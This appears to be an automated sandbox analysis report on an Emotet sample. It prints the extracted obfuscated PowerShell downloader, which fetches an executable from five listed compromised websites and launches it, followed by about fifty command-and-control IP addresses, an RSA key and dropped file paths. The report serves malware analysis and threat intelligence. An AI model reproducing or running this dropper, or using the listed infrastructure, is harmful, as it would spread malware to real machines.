25eace8fcf797762361e56a88c938c30f99acb13c928b8f618f0d0a6f33fd60b

General

Target: 25eace8fcf797762361e56a88c938c30f99acb13c928b8f618f0d0a6f33fd60b
Filesize: N/A
Completed: 25-12-2019 01:03
Score: 10/10
MD5: N/A
SHA1: N/A
SHA256: 25eace8fcf797762361e56a88c938c30f99acb13c928b8f618f0d0a6f33fd60b

Malware Config

Extracted

Language: ps1
Source:
$Vhdrigpty='Grnrlvjgqwiel';$Qhymddtpu = '882';$Qyfrfaxpspy='Bnboragzlr';$Katqhsrg=$env:userprofile+'\'+$Qhymddtpu+'.exe';$Oajndrulr='Sztguxzwwkuo';$Fuzjdsgve=&('n'+'ew'+'-ob'+'ject') nET.WebCliENT;$Vxyzyvysfm='http://diwafashions.com/wp-admin/mqau6/*http://designers.hotcom-web.com/ubkskw29clek/qnpm1p/*http://dixartcontractors.com/cgi-bin/nnuv/*http://diaspotv.info/wordpress/G/*http://easyvisaoverseas.com/cgi-bin/v/'."sPl`IT"('*');$Puwqofghl='Nbpxdnud';foreach($Hdikcevbuczha in $Vxyzyvysfm){try{$Fuzjdsgve."dowNLoad`F`Ile"($Hdikcevbuczha, $Katqhsrg);$Pyumbmvbvt='Hnxyvcsn';If ((&('G'+'et-Ite'+'m') $Katqhsrg)."len`gTh" -ge 28411) {[Diagnostics.Process]::"sTa`RT"($Katqhsrg);$Ggwjysxz='Xavcdmslgpx';break;$Ubafrskfyb='Gfcxiyuamjn'}}catch{}}$Rpacexerubixn='Akzyyoxhp'

URLs (type: exe.dropper for each entry):
http://diwafashions.com/wp-admin/mqau6/
http://designers.hotcom-web.com/ubkskw29clek/qnpm1p/
http://dixartcontractors.com/cgi-bin/nnuv/
http://diaspotv.info/wordpress/G/
http://easyvisaoverseas.com/cgi-bin/v/

Extracted

Family: emotet
C2:
24.181.125.62:80
98.156.206.153:80
173.21.26.90:80
108.61.99.179:8080
165.227.156.155:443
159.69.89.130:8080
167.99.105.223:7080
5.196.74.210:8080
200.7.243.108:443
183.102.238.69:465
64.147.15.138:80
85.152.174.56:80
59.148.227.190:80
62.75.187.192:8080
174.77.190.137:8080
87.106.139.101:8080
173.247.19.238:80
2.38.99.79:80
178.210.51.222:8080
209.141.54.221:8080
91.242.138.5:443
190.147.215.53:22
186.67.208.78:8080
107.170.24.125:8080
81.0.63.86:8080
100.14.117.137:80
190.220.19.82:443
76.164.99.46:80
190.189.224.117:443
110.143.57.109:80
47.156.70.145:80
206.189.112.148:8080
217.160.182.191:8080
47.149.28.234:80
2.237.76.249:80
45.51.40.140:80
128.65.154.183:443
138.59.177.106:443
78.24.219.147:8080
87.230.19.21:8080
200.114.167.85:80
149.202.153.252:8080
82.27.181.93:80
173.91.11.142:80
66.25.34.20:80
190.162.159.212:80
176.106.183.253:8080
139.130.241.252:443
46.105.131.87:80
73.11.153.178:8080

rsa_pubkey.plain:
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAKl4M80uy0jcxUiFIaJJyxgHVVnFtCq6
bi6f2xXPh/XUZNyN8UXDe5HzhTc4kwon9MBZffNwFOIc61QfV3K3YzEI/ktcyNqK
LS67ONxsVep769QdiVQJXrIaFjMXKz6viwIDAQAB
-----END PUBLIC KEY-----
Signatures

Downloads
• C:\Users\Admin\882.exe
• C:\Users\Admin\882.exe
• C:\Users\Admin\882.exe
• C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438
• memory/3848-8-0x00000000023C0000-0x00000000023D7000-memory.dmp
• memory/4368-11-0x00000000020F0000-0x0000000002107000-memory.dmp
• memory/4368-12-0x0000000000400000-0x00000000004AA000-memory.dmp
• memory/4968-2-0x00000177E660B000-0x00000177E6614000-memory.dmp